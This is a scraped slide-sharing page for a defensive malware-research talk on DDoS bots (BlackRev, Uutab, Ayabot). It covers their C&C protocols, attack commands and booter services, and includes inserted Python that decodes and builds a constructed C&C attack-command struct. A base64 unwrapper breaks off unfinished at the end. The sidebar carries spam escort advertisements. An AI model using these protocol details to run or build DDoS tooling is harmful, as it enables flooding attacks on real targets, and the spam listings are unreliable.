Attribution – FireEye's Sunshop Campaign
Certificate
Trends and Takeaways
Languages
• C/C++
• Delphi
• C#/.NET
• Visual Basic
• Perl
• PHP
– itsoknoproblembro
• Python
• Java
Visual Basic Aside
C&C Types
• HTTP
• Binstruct
• IRC
• ASCII
Crypto
• XOR
• Base64
• Rot13
• RC4
• Compression
– Zlib
– LZO
Attack Types in the Wild
• http_get – 57%
• slowloris – 19%
• http_post – 12%
• other – 7%
• tcp – 3%
• udp – 2%
• tcp_connect – 0%
• tcp_syn – 0%
• icmp – 0%
• arme – 0%
• rudy – 0%
Miscellaneous
• Copy and paste culture
• Lots of broken implementations
• Too many flood types
• DNS amplifications attacks are starting to be
integrated into bots
Questions/Comments/Feedback
• dschwarz@arbor.net
• @tildedennis
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...Peter Kálnai
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Andrew Case
 
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You Think
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You ThinkHITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You Think
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You ThinkHacks in Taiwan (HITCON)
 
Ad, mimikatz, ata and (awe)some evasion techniques
Ad, mimikatz, ata and (awe)some evasion techniquesAd, mimikatz, ata and (awe)some evasion techniques
Ad, mimikatz, ata and (awe)some evasion techniquesGuglielmo Scaiola
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020Jose Palanco
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
 
Heartache and Heartbleed - 31c3
Heartache and Heartbleed - 31c3Heartache and Heartbleed - 31c3
Heartache and Heartbleed - 31c3Nick Sullivan
 
Drilling Down Into DNS DDoS
Drilling Down Into DNS DDoSDrilling Down Into DNS DDoS
Drilling Down Into DNS DDoSAPNIC
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
DNS Security Threats and Solutions
DNS Security Threats and SolutionsDNS Security Threats and Solutions
DNS Security Threats and SolutionsInnoTech
 

Similar to ASERT's DDoS Malware Corral, Volume 2 (20)

Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at Scale
 
DDoS Attacks - Scenery, Evolution and Mitigation
DDoS Attacks - Scenery, Evolution and MitigationDDoS Attacks - Scenery, Evolution and Mitigation
DDoS Attacks - Scenery, Evolution and Mitigation
 
Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"
Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"
Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"
 
Travelling to the far side of Andromeda
Travelling to the far side of AndromedaTravelling to the far side of Andromeda
Travelling to the far side of Andromeda
 
Common Browser Hijacking Methods
Common Browser Hijacking MethodsCommon Browser Hijacking Methods
Common Browser Hijacking Methods
 
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
 
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You Think
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You ThinkHITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You Think
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You Think
 
Ad, mimikatz, ata and (awe)some evasion techniques
Ad, mimikatz, ata and (awe)some evasion techniquesAd, mimikatz, ata and (awe)some evasion techniques
Ad, mimikatz, ata and (awe)some evasion techniques
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
NPTs
NPTsNPTs
NPTs
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
snort.ppt
snort.pptsnort.ppt
snort.ppt
 
Heartache and Heartbleed - 31c3
Heartache and Heartbleed - 31c3Heartache and Heartbleed - 31c3
Heartache and Heartbleed - 31c3
 
Drilling Down Into DNS DDoS
Drilling Down Into DNS DDoSDrilling Down Into DNS DDoS
Drilling Down Into DNS DDoS
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
DNS Security Threats and Solutions
DNS Security Threats and SolutionsDNS Security Threats and Solutions
DNS Security Threats and Solutions
 

Recently uploaded

Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Deliverybabeytanya
 
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girladitipandeya
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024APNIC
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...Diya Sharma
 
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneRussian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneCall girls in Ahmedabad High profile
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$kojalkojal131
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girlsstephieert
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Delhi Call girls
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Dana Luther
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirtrahman018755
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGAPNIC
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607dollysharma2066
 
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝soniya singh
 

Recently uploaded (20)

Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In South Ex 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
 
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
 
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneRussian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
 
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
 

ASERT's DDoS Malware Corral, Volume 2

Editor's Notes

  1. Good morning. Today I’m going to share some research from ASERT’s DDoS Malware Corral. ASERT is Arbor Networks’ malware research team, and this presentation is our second “state of the union of DDoS malware”, if you will. If interested, the slides for our first volume, presented last year, can be found online under the same title.
  2. This is what I’ll be covering. First, who I am. Second, what is mcorral. Followed by a really quick primer on DDoS so that we’re on the same page. Then, I’ll get into the details of the malwares. And I’ll finish with some trends and takeaways.
  3. My name is Dennis Schwarz and I’m a malware researcher.
  4. What is mcorral? Mcorral is our malware collection, storage, and processing system. We’re on our second generation now and started transitioning to it in the middle of 2013. The first generation system definitely served its purpose, but we decided to take the best features of it and re-implement it as a much more dynamic and configurable platform. We also have a dedicated dev-team now to keep up with the researchers’ “wish lists”. This allows researchers to focus on malware instead of taking time off to implement a new feature.
  5. Metaphorically, mcorral looks like this: like a bunch of horses in a horse corral.
  6. Visually, it looks like this. This is a screenshot of part of the researcher’s primary user interface.
  7. And, logically, it looks like this. Malware comes in. It’s prioritized and run through our sandboxen. The results are post-processed and organized. And finally, out come (hopefully) actionable items for various consumers.
  8. After mcorral and the researchers do their business, we get DDoS malware. Here’s a sampling. We actually get much more than just DDoS related malware, but for now we’ll gloss over that. http://worditout.com
  9. Before getting into the malware, I wanted to give a real quick overview of DDoS. The attacks on this slide are what I would consider the “basic suite” of attacks. They pretty much do what they say. Implementation-wise, TCP SYN floods are usually implemented as connect floods. This is due to the ease of calling the connect function and restrictions on raw sockets in Windows. And the HTTP attacks are differentiated by their headers and header content.
  10. These are what I would consider the “Layer 7” suite. Slowloris opens several web sessions to the target and holds them open for as long as possible, dribbling out bytes. ARME, or Apache Remote Memory Exhaustion, or Apache Killer, sends a crazy Range header that mucks up older versions of Apache. RUDY, or R-U-Dead-Yet, sends an endless stream of POST data. And DNS refers to DNS protocol aware attacks.
  11. Another suite of attacks are the reflection and amplification attacks. Here are some of the common services that allow for this. The port 19 chargen service is the grandfather of amplification attacks. DNS amplification, of course, took down Spamhaus in early 2013 to a lot of press. And NTP amplification has been in the spotlight recently: the January attack on major gaming networks and the February attack being pegged as the largest Internet DDoS attack seen so far. SNMP has a few amplification/reflection avenues as well, so it wouldn’t surprise me if it’s the next big news maker…
  12. Every DDoS talk needs to mention “booter” sites, so here is that slide. This is a screenshot of twbooter, the service used to take down Brian Krebs’ website in early 2013, which was followed by a “swatting” attack on his house. These types of booter sites are everywhere and have been around for a long time. They are used a lot in the gaming worlds to boot off other gamers, and also used between conflicting/competing booter sites, hacking forums, and other hacking “cliques”.
  13. Now, on to the malware. Why did I choose to share the following families? First, DDoS is Arbor Networks’ bread and butter, so I spend a good deal of my time on DDoS malware. Second, part of the post-processing/output done by mcorral bubbles up potentially new and interesting samples for humans to look at, so a lot of these came from that pile. Third, these families are certainly less well known than, for example, Brobot, Dirtjumper, etc. But, with that, most of the associated campaigns are smaller and that allows me to get a more complete picture of them. These families were also mostly active in the wild when I started looking at them, which is always a nice benefit. Lastly, these are some of the malware families that I’ve personally reverse engineered and tracked, so they’re a bit like my pet malware.
  14. First up on my list is Trojan.BlackRev. I wrote about this family in a blog post released last year, but I wanted to talk about it here because it shows what I consider a complete life cycle of a malware family.
  15. It was born circa March 2013.
  16. It is Russian in origin. This isn’t a big surprise, as Russia is a major DDoS player. Source: http://en.wikipedia.org/wiki/File:Russian_Federation_(orthographic_projection).svg
  17. It’s written in Delphi. Also not a big surprise, as Russian malware coders love Delphi. I have a personal theory that either Russian computer science programs are still teaching Delphi programming, or that’s what the language of choice was when the current generation of Russian DDoS coders were going through school.
  18. I got its name from a mutex that it creates on an infected system. Here’s an IDA screenshot of that code.
  19. Its full name is actually “Black Revolution”, as can be seen in this panel screenshot. This panel isn’t very fancy, just basic and to the point.
  20. Some of the forums that blackrev was being advertised in were: Shopworld.biz, a Russian language forum, and Elite hack forums, an English language forum. Here is the advert for the latter.
  21. Pricing was in WebMoney’s WMZ currency. WMZ is WebMoney’s USD equivalent. So selling for a few hundred dollars.
  22. The author was someone going by the handle “silence”. Here is a thread on shopworld.biz where he claims blackrev as his own. When I was originally looking at blackrev, there wasn’t much attribution on silence besides an ICQ number.
  23. But, following up for this talk… it looks like in December 2013 silence upset somebody and they decided to “dox” him. Take it with a grain of salt though… it’s as accurate as any other “doxing”.
  24. On to the C&C. This is what blackrev’s C&C phone home looks like on the wire: a standard HTTP GET based C&C protocol. These types of protocols are great because it’s easy to do an inurl search for new C&C hosts.
  25. This is what the command polling looks like.
  26. Here are the attack related commands. There are certainly a bunch of them. These are all from the basic suite of DDoS attacks: HTTP floods, TCP floods, UDP floods, etc.
  27. During its lifetime, I was able to track 6 distinct C&C hosts. Here they are on a Google map. @NO_UPDATE
  28. Here are the attack commands sent from these C&Cs. An HTTP GET flood was the most popular. @NO_UPDATE
      malware=> \o blackrev_cmds
      malware=> select cmd from ddos_commands where cc_channel='blackrev';
      malware=> \o
      cut -d "|" -f 1 blackrev_cmds | sort | uniq -c | sort -nr
  29. These were the targeted countries based on geo IP. Russia and the UK being the most targeted. @NO_UPDATE
      select target_cc, count(*) from ddos_commands where cc_channel='blackrev' group by target_cc order by count(*) desc;
  30. And these were some of the targets observed. These sites resolve into the following categories: porn, competing DDoS/booter services, hacking sites, drug marketplace, scripting site, ad site, construction company, carding forum. @NO_UPDATE Worditout.com
  31. As mentioned at the start, this is the life cycle of blackrev. So circa June 2013, about 3 months after its release, silence decided to sell the project. And this effectively kills off blackrev, as we haven’t seen any new samples since.
  32. To further validate its death, in October 2013, someone leaked its source code on a public forum. I want to say this is the “fuckav” forum, but I’m not 100% sure on that. Google Translate wasn’t doing a great job with this URL, but it essentially says “blackrev source code”.
  33. Just to verify, I downloaded the leaked code and tracked down the CreateMutex function in the Delphi code that we saw earlier in the IDA screenshot. So far, I haven’t come across any blackrev code forks or variants. That was the life and death of Trojan.BlackRev.
  34. Next up is “The APT”, or Trojan.UUTab.
  35. UUtab was first seen circa May 2013.
  36. I of course say “APT” because it is Chinese in origin. Chinese DDoS bots aren’t a big surprise, as China is also a major DDoS player. Source: http://en.wikipedia.org/wiki/File:People%27s_Republic_of_China_(orthographic_projection).svg
  37. It is written in C++.
  38. And its name comes from a piece of its C&C phone home. The “magic number”, if you will. This is an IDA screenshot of the “send phone home” function, and we can see the Uutab in the middle strcpy call.
  39. The C&C host details are obfuscated in the binary using an XOR with a 126 digit hardcoded key. This Python function can be used to decrypt it.
  40. This IDA screenshot shows the decryption in action.
  41. The C&C protocol is what we call a binstruct. A binstruct is essentially a C structure with a mixture of ASCII and binary data members and a fixed length, sent over the wire. Uutab comes in a 516 or a 1028 byte flavor. This slide shows the former.
  42. This is what the binstruct looks like on the wire.
  43. This is what the 516 byte C&C response looks like. Again a binstruct. The params struct defines the DDoS target host, port, timing, number of threads, etc.
  44. And here is the 1028 byte version. What they added in this version is the ability to specify up to 18 DNS servers, which allows for some DNS attacks.
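An added example, not code from the talk or from the Uutab bot, of how a C&C monitoring script can decode the fixed-length binstruct messages described in notes 41 to 44. Only the two sizes (516 and 1028 bytes), the "Uutab" magic, the params fields (target host, port, timing, threads) and the 18 DNS server slots come from the talk; the field order, offsets, byte order and names below are a constructed layout used for illustration, since the page does not give the real one.

```python
"""Decoder for a fixed-length "binstruct" C&C message.

CONSTRUCTED layout: the field offsets here illustrate the message class from
the talk (fixed-size C struct, mixed ASCII and binary members, 516- or
1028-byte variants). They are not the real Uutab layout.
"""
import socket
import struct
from dataclasses import dataclass, field

SHORT_LEN = 516        # base variant (size from the talk)
LONG_LEN = 1028        # variant that adds DNS servers (size from the talk)
MAX_DNS_SERVERS = 18   # from the talk

# Hypothetical header, little-endian and packed: 8-byte ASCII magic, u32 command id,
# 256-byte ASCII target host, u16 port, u16 pad, u32 interval (ms), u32 thread count.
HEADER = struct.Struct("<8sI256sHHII")
HEADER_LEN = HEADER.size                              # 280 bytes
DNS_LIST = struct.Struct("<" + "4s" * MAX_DNS_SERVERS)  # 18 raw IPv4 addresses


@dataclass
class Command:
    magic: str
    cmd: int
    target: str
    port: int
    interval_ms: int
    threads: int
    dns_servers: list = field(default_factory=list)


def detect_variant(msg: bytes):
    """'short', 'long', or None when the length matches neither fixed size."""
    return {SHORT_LEN: "short", LONG_LEN: "long"}.get(len(msg))


def _cstr(raw: bytes) -> str:
    """Decode a NUL-terminated ASCII field and ignore whatever follows the NUL:
    strcpy into a fixed buffer leaves stale bytes behind the terminator."""
    return raw.split(b"\x00", 1)[0].decode("ascii", errors="replace")


def parse_command(msg: bytes) -> Command:
    variant = detect_variant(msg)
    if variant is None:
        raise ValueError(f"unexpected binstruct length {len(msg)}")
    magic, cmd, host, port, _pad, interval, threads = HEADER.unpack_from(msg, 0)
    command = Command(_cstr(magic), cmd, _cstr(host), port, interval, threads)
    if variant == "long":
        # The DNS server list follows the header; all-zero slots are unused.
        for raw_ip in DNS_LIST.unpack_from(msg, HEADER_LEN):
            if raw_ip != b"\x00" * 4:
                command.dns_servers.append(socket.inet_ntoa(raw_ip))
    return command


def build_command(cmd, target, port, interval_ms, threads, dns_servers=()):
    """Build a sample message of either size (used to construct test input)."""
    body = HEADER.pack(b"Uutab", cmd, target.encode(), port, 0, interval_ms, threads)
    if dns_servers:
        ips = [socket.inet_aton(ip) for ip in dns_servers]
        ips += [b"\x00" * 4] * (MAX_DNS_SERVERS - len(ips))
        body += DNS_LIST.pack(*ips)
        total = LONG_LEN
    else:
        total = SHORT_LEN
    return body.ljust(total, b"\x00")   # zero-fill to the fixed wire length


if __name__ == "__main__":
    # Constructed sample: a long-variant command naming two DNS servers.
    sample = build_command(7, "victim.example.invalid", 53, 1000, 8,
                           ["192.0.2.1", "192.0.2.2"])
    print(parse_command(sample))
```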
  45. Here are the full set of attack commands, again mostly comprised of the basic suite. In addition, there are 2 DNS related attacks: an A query flood on a server and a DNS amplification attack using up to 18 open DNS resolvers. This one is very interesting to me, as it was the first botnet in the wild that I’ve seen to support a distinct DNS amplification attack command. That’s not to say that DNS amplification hasn’t been around forever… it has, but mostly in the form of standalone scripts and a list of open DNS resolvers.
  46. I’ve been tracking close to 170 Uutab C&Cs since May and had only seen 1 attack come through. It was an attack on an IP in China. So I was thinking that maybe there was a bug in the monitoring code (very possible), or that these C&Cs just die really quickly and the samples were old by the time they got to mcorral, or maybe they’re doing some kind of geoblocking/Tor blocking. But last night, interestingly enough, doing one last check before giving my talk this morning, I saw a second attack come through, on a Chinese mortgage/loan company. Very timely. So my new theory is that Uutab campaigns are possibly using very small and short attack windows. @NO_UPDATE
      python src/get_lat_long_by_tag.py uutab > uutab.csv
  47. I’m still monitoring this family and it was last seen circa February 2014. @UPDATE
  48. Next up, “Give ’em the boot”, or Trojan.Ayabot. To give credit, the SonicWall folks and the myexperimentswithmalware blog released their analysis on Ayabot first, but I just failed to find it at the time. These slides are based on my own research though.
  49. Aya is an acronym for a hacker (or possibly a hacking group) known as AreYouAreDo.
  50. First seen circa May 2013.
  51. Another Russian bot. Source: http://en.wikipedia.org/wiki/File:Russian_Federation_(orthographic_projection).svg
  52. And of course it’s written in Delphi.
  53. Instead of selling a malware or botnet, AreYouAreDo uses the Ayabot botnet to support a booter site and sells a DDoSing service. This is a translated screenshot of the booter site showing its marketing and pricing. It’s interesting to note that they also sell/resell an anti-DDoSing service (the last section of the black box).
  54. Ayabot uses a multi-staged C&C protocol over HTTP. The first stage is an optional C&C redirection feature. You should be able to see the redirect here in this Wireshark screenshot, but it looks like they are trying to foil us with some secure base64 encoding.
  55. It actually turns out to be triple-base64! So, very secure indeed. Once decoded, we can see the second stage C&C URL.
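An added example, my code rather than Ayabot’s or the talk’s, of unwrapping the triple-base64 redirect from notes 54 and 55 for C&C monitoring: decode strictly, one layer at a time, and stop at the first layer that is no longer well-formed base64 (a URL contains ':' and '.') or that would decode to non-printable bytes. The sample URL and its three layers of wrapping are constructed.

```python
"""Peel nested base64 layers from a C&C redirect string."""
import base64
import binascii
import string

PRINTABLE = set(string.printable.encode())
MAX_LAYERS = 8   # guard against pathological inputs that never stop decoding


def _strict_b64decode(data: bytes):
    """Decoded bytes, or None when `data` is not well-formed base64
    (wrong length, non-alphabet characters, bad padding)."""
    if len(data) % 4 != 0:
        return None
    try:
        return base64.b64decode(data, validate=True)
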